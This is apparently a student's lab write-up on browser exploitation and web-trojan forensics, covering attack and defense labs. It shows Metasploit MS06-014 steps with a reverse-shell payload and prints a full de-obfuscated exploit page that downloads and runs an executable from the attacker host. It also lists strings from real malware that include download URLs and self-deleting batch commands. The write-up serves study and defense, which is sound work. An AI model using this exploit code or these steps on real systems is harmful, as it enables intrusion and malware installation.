20199121《网络攻防实践》第十二周作业

目录

• 前言
• 1.知识点梳理与总结
  • 1.1 web浏览器的技术发展与安全威胁
  • 1.2 web浏览端的渗透攻击威胁——网页木马
• 2.实践
  • 2.1 动手实践——web浏览器渗透攻击实验
    • 实践过程
  • 2.2 取证分析实践——剖析一个实际的网页木马攻击场景
    • 实践过程
  • 2.3 攻防对抗实践——web浏览器渗透攻击攻防对抗
    • 实践过程
  • 2.4 取证分析实践——web浏览器遭遇攻击
    • 实践过程
• 3.学习中遇到的问题及解决
• 4.学习感想和体会
• 参考资料

前言

问题	回答
这个作业属于那个课程	网络攻防实践
这个作业的要求在哪里	《网络攻防实践》第十二周作业
学习内容	第十二章 web浏览器安全攻防

1.知识点梳理与总结

1.1 web浏览器的技术发展与安全威胁

• web浏览器软件的安全困境三要素
  • 复杂性：现代浏览器的复杂性已经通过源代码行数得到了验证。现代浏览器软件的复杂性意味着更多的错误和安全缺陷，也就导致了目前浏览器软件中存在着可被渗透攻击所利用的大量安全漏洞。
  • 可扩展性： 目前几乎所有的现代浏览器软件都支持第三方插件扩展机制， 但第三方扩展插件的开发过程更缺乏安全保证，出现安全漏洞的情况更为普遍。
  • 连通性：浏览器软件始终工作在联网状态，一旦其中存在安全漏洞，就很容易被网络上的威胁源所利用与攻击。
• Web浏览安全威胁位置
  • 针对传输网络的网络安全协议安全威胁
  • 针对Web端系统平台的安全威胁
  • 针对Web浏览器软件及插件程序的渗透攻击威胁
  • 针对互联网用户的社会工程学攻击威胁

• web浏览安全威胁类型
  • 网络钓鱼（Phishing）：架设钓鱼网站，如知名金融机构及商务网站，发送大量欺骗性垃圾邮件，诱骗因特网用户访问钓鱼网站并以敏感信息登录，最后滥用个人敏感信息。
  • 恶意木马与流氓软件下载：主要包括两大问题：软件捆绑安装问题 ，Web浏览时遭遇的软件信任问题 。
  • 网页木马－浏览器渗透攻击：网页感染已成为国内互联网最重要的恶意代码传播形式
  • 不良信息内容

1.2 web浏览端的渗透攻击威胁——网页木马

• 网页木马的机理分析

  • 网页木马本质上利用了web浏览器软件中所支持的客户端脚本执行能力，针对web浏览器软件安全漏洞实施客户端渗透攻击，从而取得在客户端主机的远程代码执行权限来植入恶意程序。

  • 网页木马攻击是被动的，需要诱使用户访问网页木马页面。

  • 网页木马攻击流程如下，可以发现网页木马的难点有三：多样化的客户端渗透攻击位置和技术类型；分布式、复杂的微观链接结构；灵活多变的混淆与对抗分析能力。

    

  • 网页挂马机制：将写好的网页木马挂接到一些拥有客户流量的网络页面上。主要方法有四：

    • 内嵌HTML标签：最常用的内嵌标签为iframe，iframe的功能是在页面中创建内嵌框架，用于包含和显示其他文档页面，当包含页面被打开，被包含的页面也会被请求显示在内嵌框架中。
    • 恶意script脚本：上一次XSS攻击实验有用到。
    • 内嵌对象链接：利用图片、flash等内嵌对象中的特定方法来完成指定页面的加载。
    • ARP欺骗挂马：在以上三种的基础上，通过ARP欺骗可以进行中间人攻击。

  • 网页混淆机制：对抗反病毒软件的检测，提高反病毒分析难度。目前常用的混淆方法：

    • 将代码重新排版
    • 通过大小写、进制、编码等混淆
    • 对网页木马进行加密
    • 利用字符串运算、数学运算或特殊函数
    • 修改网页木马文件

• 网页木马的检测与分析：主要分为静态和动态，静态的误报率较高，效果较差，动态行为分析可以判定是否为网页木马，但无法提供目标组件、利用漏洞位置与类型等更为全面的语义信息。

  • 基于特征码匹配的传统检测
  • 基于统计与机器学习的静态分析
  • 基于动态行为结果判定的检测分析
  • 基于模拟浏览器环境的动态分析检测：在应对脚本语言特有的混淆变形机制，恢复网页木马原始形态上效果较好。

• 网页木马防范措施

  • 对操作系统或第三方软件的更新
  • 安装优秀的杀毒软件

2.实践

2.1 动手实践——web浏览器渗透攻击实验

• 实验环境
  • 攻击机kali【IP地址：192.168.0.16】
  • 靶机Win2kServer【IP地址：192.168.0.13】
• 题目
  • 使用Metasploit的MS06-014渗透攻击模块（ie_createobject）
  • 选择payload为任意远程连接，设置参数，得到恶意url地址
  • 靶机访问该恶意地址，在攻击机中查看攻击状态，并通过渗透建立的SESSION在靶机上执行命令

实践过程

• 在本次实践中，我们利用的漏洞是MS06-014，这是一个挂马漏洞，即通过该漏洞可以将写好的木马挂接到正常网页上，终端用户访问该网页时即被攻击。

• 照例在kali中打开msfconsole，搜索MS06-014，发现一个可使用的module。

  

• 设置攻击机地址set LHOST 192.168.0.16

  设置payloadset payload windows/meterpreter/reverse_tcp

  攻击exploit

  

• 得到有木马的网址http://192.168.0.16:8080/1kxHLD，在靶机中访问该地址，再回到攻击机中发现已经建立会话，攻击完成。

  
  

• 用sessions查看目前的连接，使用命令sessions -i 1选择会话1，返回meterpreter，此时攻击机便可以在靶机上执行命令。

• 使用getuid查看当前权限为administrator，使用ifconfig查看靶机IP。

  
  

2.2 取证分析实践——剖析一个实际的网页木马攻击场景

• 题目：一个研究组发现了一个域名为 18dd.net 的挂马网站。在链接分析的过程中， 发现有大量恶意网页最终都重定向到了这个网站上。进一步 的研究分析表明，这个网站的恶意代码入口是 http://aa.18dd.net/ww/new09.htm 文件。现在 你的任务是根据给出的说明逐步分析，得到最终的木马文件的内容。
  • 试述你是如何一步步地从所给的网页中获取最后的真实代码的？
  • 网页和 JavaScript 代码中都使用了什么样的加密方法？你是如何解密的？
  • 从解密后的结果来看，攻击者利用了那些系统漏洞？
  • 解密后发现了多少个可执行文件？其作用是什么？
  • 这些可执行文件中有下载器么？如果有，它们下载了哪些程序？这些程序又是什么作用的？

实践过程

• 由于没有实验环境，所以先照着参考答案把整个分析流程梳理一遍。

  • start.html 文件在引用new09.htm文件时没有写绝对路径，所以 new09.htm 文件与 start.html 文件在同一目录下，由此就得到new09.htm 文件。

  • new09.htm 文件中，用 iframe 引用了一个 http://aa.18dd.net/aa/kl.htm 文件， 又用 javascript 引用了一个 http://js.users.51.la/1299644.js 文件。 计算散列之后可以得到这两个文件内容。前者为我们要分析的，后者仅为一个流量统计代码。

  • 分析kl.htm 文件，发现其通过XXTEA+Base64 加密，加密密钥使用16进制加密后在代码中给出为script，解密后发现文件还有16进制加密，继续解密，得到代码。

  • 利用到的应用程序漏洞有 Adodb.Stream、MPS.StormPlayer、POWERPLAYER.PowerPlayerCtrl.1和BaiduBar.Tool， 分别对应利用了微软数据库访问对象、暴风影音、PPStream 和百度搜霸的漏洞。

    另外，这个文件还引用三个 js 文件（1.js、b.js、pps.js）和一个 压缩包(bd.cab，解开后是 bd.exe)。

  • 1.js下载了一个 http://down.18dd.net/bb/014.exe 的可执行文件，后面部分 是对 ADODB 漏洞的继续利用。b.js也下载了一个可执行文件bf.exe，pps.js下载可执行文件pps.exe。

  • 至此，得到四个exe文件。发现这四个文件在资源管理器中显示出同样的大小。进一步对文件内容进行 MD5 散列计算得出结论，这四个文件内容完全相同。

• 根据以上，只需分析一个exe文件即可。此处选择pps.exe。

• 使用工具PEID打开pps.exe查看是否加壳，发现没有加壳。

• 用工具W32DAsm 反汇编这个 exe 文件，参考—>串式参考，可以发现如下内容。得出结论：

  • 这个程序可能生成一个叫Alletdel.bat的批处理文件，这个文件中有一个标签叫try， 批处理文件会不断的执行这个标签下一行的命令，命令内容可能是判断文件存在性，更改系统日 期，删除某些文件（goto try，:try，Alletdel.bat，cmd /c date ，cmd /c date 1981-01-12，del %0等）
  • 这个程序可能在磁盘根目录下生成自动运行的文件，以求用户不小心时启动程序（:\AutoRun.inf，[AutoRun] open=，AutoRun.inf，shell\Auto\command=）
  • 这个程序要对 IE、注册表、服务和系统文件动手脚（advapi32.dll， drivers/klif.sys，\program files\internet explorer\IEXPLORE.EXE，IE 执行保护， IEXPLORE.EXE，Software\Microsoft\Windows\CurrentVersion\Poli等）
  • 这个程序有一定的防系统保护软件的能力（ "瑞星卡卡上网安全助手 - IE 防漏墙"， "允许"，"允许执行"）
  • 这个程序要下载一堆木马（一堆形如http://down.18dd.net/kl/**.exe的字符串， 共 20 个）

  " goto try"
  "#32770"
  "(T@"
  ",T@"
  ".1
  "
  ":\AutoRun.inf"
  ":try"
  "[AutoRun]
  open="
  "\program files\internet explorer\IEXPLORE.EXE"
  "0813"
  "3烂怱VQ嬝媠咑u3离&j"
  "60000"
  "advapi32.dll"
  "Alletdel.bat"
  "AutoRun.inf"
  "Button"
  "ChangeServiceConfig2A"
  "ChangeServiceConfig2W"
  "cmd /c date "
  "cmd /c date 1981-01-12"
  "del ""
  "del %0"
  "drivers/klif.sys"
  "Error"
  "FPUMaskValue"
  "http://down.18dd.net/kl/0.exe"
  "http://down.18dd.net/kl/1.exe"
  "http://down.18dd.net/kl/10.exe"
  "http://down.18dd.net/kl/11.exe"
  "http://down.18dd.net/kl/12.exe"
  "http://down.18dd.net/kl/13.exe"
  "http://down.18dd.net/kl/14.exe"
  "http://down.18dd.net/kl/15.exe"
  "http://down.18dd.net/kl/16.exe"
  "http://down.18dd.net/kl/17.exe"
  "http://down.18dd.net/kl/18.exe"
  "http://down.18dd.net/kl/19.exe"
  "http://down.18dd.net/kl/2.exe"
  "http://down.18dd.net/kl/3.exe"
  "http://down.18dd.net/kl/4.exe"
  "http://down.18dd.net/kl/5.exe"
  "http://down.18dd.net/kl/6.exe"
  "http://down.18dd.net/kl/7.exe"
  "http://down.18dd.net/kl/8.exe"
  "http://down.18dd.net/kl/9.exe"
  "IE 执行保护"
  "IEXPLORE.EXE"
  "IE执行保护"
  "if exist ""
  "Kernel32.dll"
  "NoDriveTypeAutoRun"
  "ntdll.dll"
  "QueryServiceConfig2A"
  "QueryServiceConfig2W"
  "S@"
  "serdst.exe"
  "shell\Auto\command="
  "shellexecute="
  "SOFTWARE\Borland\Delphi\RTL"
  "Software\Microsoft\Windows\CurrentVersion\Poli"
  "Telephotsgoogle"
  "U嬱兡餝VW3繳h訹@"
  "U嬱筧"
  "U嬱伳SVW?"
  "ZwUnmapViewOfSection"
  "刌@"
  "銼@"
  "婦$鰼"
  "媩$(?"
  "燬@"
  "擮@"
  "确定"
  "媆$?搡?婼婥t?燖"
  "瑞星卡卡上网安全助手 - IE防漏墙"
  "为即插即用设备提供支持"
  "圷@"
  "允许"
  "允许执行"
  

• 选择上述20个木马其中之一进行分析，此处选择5.exe。照例使用PEID查看加壳情况，发现用“Upack 0.3.9 beta2s -> Dwing”加密过。

  

• 尝试用工具超级巡警进行脱壳，将得到的脱壳后的文件再用PEID进行查看，显示还有壳“Morphine 1.2 - 1.3 -> rootkit”。

  
  

• 网上说这是一个伪装壳，故用工具 W32DAsm 还是可以看到其中的字符串如下：

  ""
  "" goto Loop
  del %0
  "
  "" -r -a -s -h
  del ""
  ""
  if exist ""
  "%d"
  ".bat"
  ".exe"
  ":Loop
  "
  "@echo off
  "
  "\\"
  "\InprocServer32"
  "{2598FF45"
  "aa"
  "Apartment"
  "attrib ""
  "-BC43-10AC47853D52}"
  "C:\DFD"
  "chreaur.fon"
  "client"
  "CLSID\"
  "-DA60-F48A"
  "EnHookWindow"
  "Fonts\"
  "id.exe"
  "jhbpri.d"
  "ll"
  "MP3"
  "Music"
  "rarjani.dll"
  "rarjapi.d"
  "rarjbpi.dll"
  "rarjbtl.exe"
  "Send"
  "Software\Microsoft\Windows\CurrentVersion\expl"
  "ThreadingModel"
  "Url%d"
  "Url1"
  "U嬱S桤?嬝杓枸?+??	"
  "VC
  "
  "vercls"
  "兡X脥@"
  "岲$P钂?h"
  "嬂%郟@"
  "罜
  "
  

• 可以看到这个病毒可能要生成一个批处理文件并进行删除文件操作，因为goto Loop del %0， -r -a -s –h del，if exist ， :Loop，@echo off，attrib 这些内容都是批处理文件中的字符串。同时其中还有 ClassID 标识和注册表键 值和一些文件名。

• 使用360工具进行扫描

  
  

2.3 攻防对抗实践——web浏览器渗透攻击攻防对抗

• 题目
  • 攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码，并进行混淆处理之后组装成一个URL，通过具有欺骗性的电子邮件发送给防守方。
  • 防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态，并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。

实践过程

• 说明：题目中要求至少构造两个漏洞的渗透攻击代码，由于不会混淆，所以下面的实践仅分析实践2.1中利用MS06-014漏洞进行分析的渗透代码。

• 在实践2.1中我们已经得到了恶意url，在浏览器中打开并查看源码。

  

• 发现该网页为了防止被杀毒软件发现，对关键指令做了字符串拼接处理，还使用了大量的空白和间隔。将无效的空格符及回车符进行处理后，可以得到完整代码如下：

  <html>
  <head>
  <meta http-equiv="content-type" content="text/html; charset=GB2312">	  
  <title></title>
  <script language="javascript">	 
  function
  CtzoijGBqVnRPoW(o ,	n) 
  {
  	var r =null;  	
  	try
  	{
  		eval("r=o"+".C"+"re"+"ate"+"Ob" +"je"+"ct(n)"
  		)
  	}catch(e){}
  	if(!r)
  	{	
  		try	
  		{ eval("r=o"+".Cr"+"ea" +"teO"+"bj"+"ect(n,'')")	  
  		}catch(e){} 		 
  	}
  	if(!r)
  	{
  		try{
  		eval("r=o" +".Cr"+"ea"+ "teO"+"bj"+"ect(n,'','')"	)		
  		}
  		catch(e){}
  	} 
  	if(!r)
  	{
  		try{ 	 
  		eval("r=o" +".Ge"+"tOb"+"je"+"ct('',n)"） 
  		}catch(e){}
  	}
  	if(!r)
  	{
  		try{ 	 
  		eval("r=o" +".Ge"+"tOb"+"je"+"ct('',n)"） 
  		}catch(e){}
  	}
  	if(!r)
  	{
  		try{ 	 
  		eval("r=o" +".Ge"+"tOb"+"ject(n)"    )
  		}catch(e){}
  	}
  	return(r);			
  } 		
  function
  CkziPkDEVvzcUK(a)
  { 
  	var s=CtzoijGBqVnRPoW(a,"W" +"Sc"+"ri" +"pt"+".S"+"he"+"ll");	 
  	var o=CtzoijGBqVnRPoW(a,"A" +"DO"+"D"+"B.S"+"tr"+"eam");  	
  	var e=s.Environment("P"+"ro"+"ce" +"ss"	);
  	var url	=document.location +'/p'+'ay'+'lo'+'ad'; 
  	var	xml = null;   
  	var	bin	=e.Item("T" + "E"+"M" +	"P")+"\\LJEXNxXQoQ"+ ".e"+"xe";	  
  	var dat;  	 
  	try
  	{	
  	xml=new XMLHttpRequest();	 		
  	}
  	catch(e)	 
  	{
  		try
  		{
  		xml=new ActiveXObject("Microsoft.XMLHTTP");
  		} 
  		catch(e)	
  		{
  		xml	= new ActiveXObject("MSXML2.ServerXMLHTTP");
  		}
  	}
  	if(!xml)	  
  	{
  	return(0);
  	} 
  	xml.open("GET", url,false);  	
  	xml.send(null); 
  	dat =xml.responseBody;
  	o.Type= 1 ;
  	o.Mode= 3 ;
  	o.Open();	   	
  	o.Write(dat);
  	o.SaveToFile(bin,2);
  	s.Run(bin,0);
  }			
  function 
  SmerREcbuXkUCwZbRyMEEfsRDDQRTeK() 
  {
  var i=0;
  var t=new Array( '{'+'B'+'D'+'9'+'6'+'C'+'5'+'5'+'6'+'-'+'6'+'5'+'A'+'3'+'-'+'1'+'1'+'D'+'0'+'-'+'9'+'8'+'3'+'A'+'-'+'0'+'0'+'C'+'0'+'4'+'F'+'C'+'2'+'9'+'E'+'3'+'6'+'}','{'+'B'+'D'+'9'+'6'+'C'+'5'+'5'+'6'+'-'+'6'+'5'+'A'+'3'+'-'+'1'+'1'+'D'+'0'+'-'+'9'+'8'+'3'+'A'+'-'+'0'+'0'+'C'+'0'+'4'+'F'+'C'+'2'+'9'+'E'+'3'+'0'+'}','{'+'7'+'F'+'5'+'B'+'7'+'F'+'6'+'3'+'-'+'F'+'0'+'6'+'F'+'-'+'4'+'3'+'3'+'1'+'-'+'8'+'A'+'2'+'6'+'-'+'3'+'3'+'9'+'E'+'0'+'3'+'C'+'0'+'A'+'E'+'3'+'D'+'}','{'+'6'+'e'+'3'+'2'+'0'+'7'+'0'+'a'+'-'+'7'+'6'+'6'+'d'+'-'+'4'+'e'+'e'+'6'+'-'+'8'+'7'+'9'+'c'+'-'+'d'+'c'+'1'+'f'+'a'+'9'+'1'+'d'+'2'+'f'+'c'+'3'+'}','{'+'6'+'4'+'1'+'4'+'5'+'1'+'2'+'B'+'-'+'B'+'9'+'7'+'8'+'-'+'4'+'5'+'1'+'D'+'-'+'A'+'0'+'D'+'8'+'-'+'F'+'C'+'F'+'D'+'F'+'3'+'3'+'E'+'8'+'3'+'3'+'C'+'}','{'+'0'<h+'6'+'7'+'2'+'3'+'E'+'0'+'9'+'-'+'F'+'4'+'C'+'2'+'-'+'4'+'3'+'c'+'8'+'-'+'8'+'3'+'5'+'8'+'-'+'0'+'9'+'F'+'C'+'D'+'1'+'D'+'B'+'0'+'7'+'6'+'6'+'}','{'+'6'+'3'+'9'+'F'+'7'+'2'+'5'+'F'+'-'+'1'+'B'+'2'+'D'+'-'+'4'+'8'+'3'+'1'+'-'+'A'+'9'+'F'+'D'+'-'+'8'+'7'+'4'+'8'+'4'+'7'+'6'+'8'+'2'+'0'+'1'+'0'+'}','{'+'B'+'A'+'0'+'1'+'8'+'5'+'9'+'9'+'-'+'1'+'D'+'B'+'3'+'-'+'4'+'4'+'f'+'9'+'-'+'8'+'3'+'B'+'4'+'-'+'4'+'6'+'1'+'4'+'5'+'4'+'C'+'8'+'4'+'B'+'F'+'8'+'}','{'+'D'+'0'+'C'+'0'+'7'+'D'+'5'+'6'+'-'+'7'+'C'+'6'+'9'+'-'+'4'+'3'+'F'+'1'+'-'+'B'+'4'+'A'+'0'+'-'+'2'+'5'+'F'+'5'+'A'+'1'+'1'+'F'+'A'+'B'+'1'+'9'+'}','{'+'E'+'8'+'C'+'C'+'C'+'D'+'D'+'F'+'-'+'C'+'A'+'2'+'8'+'-'+'4'+'9'+'6'+'b'+'-'+'B'+'0'+'5'+'0'+'-'+'6'+'C'+'0'+'7'+'C'+'9'+'6'+'2'+'4'+'7'+'6'+'B'+'}','{'+'A'+'B'+'9'+'B'+'C'+'E'+'D'+'D'+'-'+'E'+'C'+'7'+'E'+'-'+'4'+'7'+'E'+'1'+'-'+'9'+'3'+'2'+'2'+'-'+'D'+'4'+'A'+'2'+'1'+'0'+'6'+'1'+'7'+'1'+'1'+'6'+'}','{'+'0'+'0'+'0'+'6'+'F'+'0'+'3'+'3'+'-'+'0'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'-'+'C'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'4'+'6'+'}','{'+'0'+'0'+'0'+'6'+'F'+'0'+'3'+'A'+'-'+'0'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'-'+'C'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'4'+'6'+'}' 	,null);	
  
  while(t[i])	  
  {
  	var a=null;
  	if(t[i].substring(0,1)=='{')
  	{
  		a=document.createElement("object"); 
  		a.setAttribute("cl"+ "as"+"sid","cl"+"s"+"id" +":"+ t[i].substring(1,t[i].length-1 ));
  	}
  	else	
  	{
  		try	  {
  			a=new ActiveXObject(t[i]);
  		}	 		
  		catch(e){}
  	}	
  	if (a)		 
  	{ 	 						
  		try {
  			var b=CtzoijGBqVnRPoW(a ,"W"+"Sc"+ "ri"+"pt"+ ".S" +"he" + "ll"	);	
  			if(b)
  			{   
  				CkziPkDEVvzcUK(a); 	
  				return(0);	 
  			} 
  			}
  		catch(e){}		
  	}	  
  	i++;
  	}
  }
  </script>
  </head>
  <body onload="SmerREcbuXkUCwZbRyMEEfsRDDQRTeK()">
  kHNbbdThGhM 	  	
  <div style="position: absolute; display: none; z-index: 9999;" id="livemargins_control">
  	<img src="0AYHSwSEujCe_files/monitor-background-horizontal.png" style="position: absolute; left: -77px; top: -5px;" width="77" height="5">	
  	<img src="0AYHSwSEujCe_files/monitor-background-vertical.png" style="position: absolute; left: 0pt; top: -5px;">	
  	<img id="monitor-play-button" src="0AYHSwSEujCe_files/monitor-play-button.png" onmouseover="this.style.opacity=1" onmouseout="this.style.opacity=0.5" style="position: absolute; left: 1px; top: 0pt; opacity: 0.5; cursor: pointer;">
  </div>
  </body>
  </html>
  

• 仔细阅读上述代码，可以发现可疑之处， 使用js调用了document.location加载了payload，并且下一行中后面跟了一个可执行文件LJEXNxXQoQ.exe，猜想这个可执行文件应该是以攻击机为服务器，通过网页下载到靶机上的，而且为了躲避杀毒软件，每次加载恶意网页生成的可执行文件的名字不一样。

• 打开靶机任务管理器查看正在运行的程序，果然发现了在网页源码中出现的那个可执行文件。

  
  

• 此外，仔细观察js代码可以发现一个很长的数组，数组内容为' { BD96C556 - 65A3 - 11D0 - 983A - 00C04FC29E36 } ', ' { BD96C556 - 65A3 - 11D0 - 983A - 00C04FC29E30 } '等等，搜索BD96C556，容易知道攻击者使用的漏洞是MS06-014。

  

2.4 取证分析实践——web浏览器遭遇攻击

• 题目：通过分析给出的网络记录pcap文件，回答以下问题：
  • 列出在捕获文件中的应用层协议类型，你认为攻击是针对哪个或哪些协议的？对于wireshark几乎没有攻击使用ICMP、Bootps、Netbios或DNS协议，显然集中在HTTP协议上。
  • 列出捕获文件中的IP地址、主机名和域名，猜测攻击场景的环境配置情况。
  • 列出捕获文件中的所有网页页面，其中哪些页面包含了可疑的、可能是恶意的JavaScript脚本代码？谁在连接这些页面？请描述恶意网页的攻击目的？
  • 请给出攻击者执行攻击动作的概要描述。
  • 攻击者引入了哪些技巧给你的分析带来了困难，请提供在之前问题中识别的恶意JavaScript脚本内容，并对它们进行解码或解密。
  • 攻击者的目标是哪个操作系统，哪些应用软件，哪些安全漏洞？如何阻止这些攻击？
  • Shellcode执行了哪些动作？请列出Shellcode的MD5，并比较他们之间的差异？
  • 在攻击场景中有二进制可执行恶意代码参与么？它们的目的是什么？

实践过程

• 使用命令chaosreader -r suspicious-time.pcap跟踪会话， 可以看到结果有HTTP、ICMP、netbios等协议 。

  

• 使用如下命令查询有哪些IP地址和域名在进行攻击， 主要是用上一步生成的.http.html文件，筛选主机并列举。参考 https://www.cnblogs.com/charlesxie/p/12920782.html

  • 服务：10.0.2.2, 10.0.3.2, 10.0.4.2, 10.0.5.2 (DHCP 服务和网关)，192.168.1.1 (DNS 服务)。
  • 受害者：10.0.2.15, 10.0.3.15, 10.0.4.15,10.0.5.15 。
  • 模拟被侵入主机：192.168.56.50 ( “rapidshare.com.eyu32.ru”)、192.168.56.51 (“shop.honeynet.sg”)
  • 攻击者：192.168.56.52 ( “sploitme.com.cn”)

   for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort 
  

  

• 使用wires hark打开suspicious-time.pcap， 发现netbios协议主机名和工作组都一样，故配置在虚拟机中。

  

• 打开之前chaosreader生成的一堆html文件，（通过index.html可以快速检索），发现了 session_0006.part_01.html 是一个需要用户名和密码的登陆界面，合理猜测这是个钓鱼网站。

  

• 攻击者其中一个攻击动作概述：

  • 受害者10.0.2.15使用Firefox浏览器连接到Rapidshare.eyu32.ru/login.php（192.168.56.50）
  • 而login.php包含sploitme.com.cn/?click=3feb5a6b2f（192.168.56.52）中的内容，该内容又被重定向到sploitme.com.cn/fg/show.php?s=3feb5a6b2f
  • 返回伪造的404页面

• 攻击者防御分析的方法：

  • 对js脚本使用了工具进行混淆，所用工具有：
    • rapidshare.eyu32.ru上的脚本
    • honeynet.sg上的脚本
  • 伪装404页面
  • 出发了漏洞利用后，转到404页面，不进行二次攻击
  • 内容用gzip压缩，不以明文显示

• 攻击者的目标（参考答案给出）：

  • Mdac : WScript.Shell - MS06-014
  • Aolwinamp: IWinAmpActiveX.ConvertFile
  • Directshow: msvidctl.dll - MS09-032 - MS09-037
  • Snapshot: MSOfficeSnapshotViewer - MS08-04
  • Com: 'msdds.dll' COM Object - MS05-052
  • Spreadsheet: OWC10.Spreadsheet - MS09-43

3.学习中遇到的问题及解决

• 问题：动手实践部分，建立session后不管输入什么命令都是unknown

• 解决：使用命令sessions -i ID 来选择会话即可返回meterpreter

• 问题：不会用不同的漏洞编写渗透代码，混淆成一个url。

• 解决：那就不混淆，用一个就OK。

4.学习感想和体会

唉除了叹气也不知道说啥，实验题目过于综合了，感觉自己就是个答案的搬运工，但是不搬运吧，我又属实做不出来。就这样吧。。

参考资料

• 《网络攻防技术与实践》(诸葛建伟著)
• 解建国的博客